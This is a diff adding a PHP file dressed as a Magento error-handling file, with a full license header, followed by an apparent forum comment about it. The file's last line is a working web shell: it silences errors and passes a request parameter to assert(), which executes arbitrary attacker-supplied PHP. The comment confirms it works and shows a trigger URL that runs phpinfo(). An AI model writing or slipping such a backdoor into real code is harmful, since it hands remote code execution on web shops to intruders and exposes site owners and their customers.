corpus/backend/1111516ffedab69ef8050f2aacb0b0a1

```diff
@@ -0,0 +1,31 @@
+<?php
+/**
+ * Magento
+ *
+ * NOTICE OF LICENSE
+ *
+ * This source file is subject to the Open Software License (OSL 3.0)
+ * that is bundled with this package in the file LICENSE.txt.
+ * It is also available through the world-wide-web at this URL:
+ * http://opensource.org/licenses/osl-3.0.php
+ * If you did not receive a copy of the license and are unable to
+ * obtain it through the world-wide-web, please send an email
+ * to license@magentocommerce.com so we can send you a copy immediately.
+ *
+ * DISCLAIMER
+ *
+ * Do not edit or add to this file if you wish to upgrade Magento to newer
+ * versions in the future. If you wish to customize Magento for your
+ * needs please refer to http://www.magentocommerce.com for more information.
+ *
+ * @category    Mage
+ * @package     Errors
+ * @copyright   Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com)
+ * @license     http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
+ */
+
+error_reporting(0);assert(stripslashes($_REQUEST[gf44jdgq]));error_reporting(E_ALL); 

```

Comment:
No quotes were lost, pretty sure about that. I have seen this before and this works. With error reporting enabled, PHP drops a notice like, `Undefined constant gf44jdgq - assumed 'gf44jdgq' file... line...`. If you would request a page containing this string on an URL like domain.com/backdoor.php?gf44jdgq=phpinfo(); , you will get the phpinfo page. It's a common but nasty practice.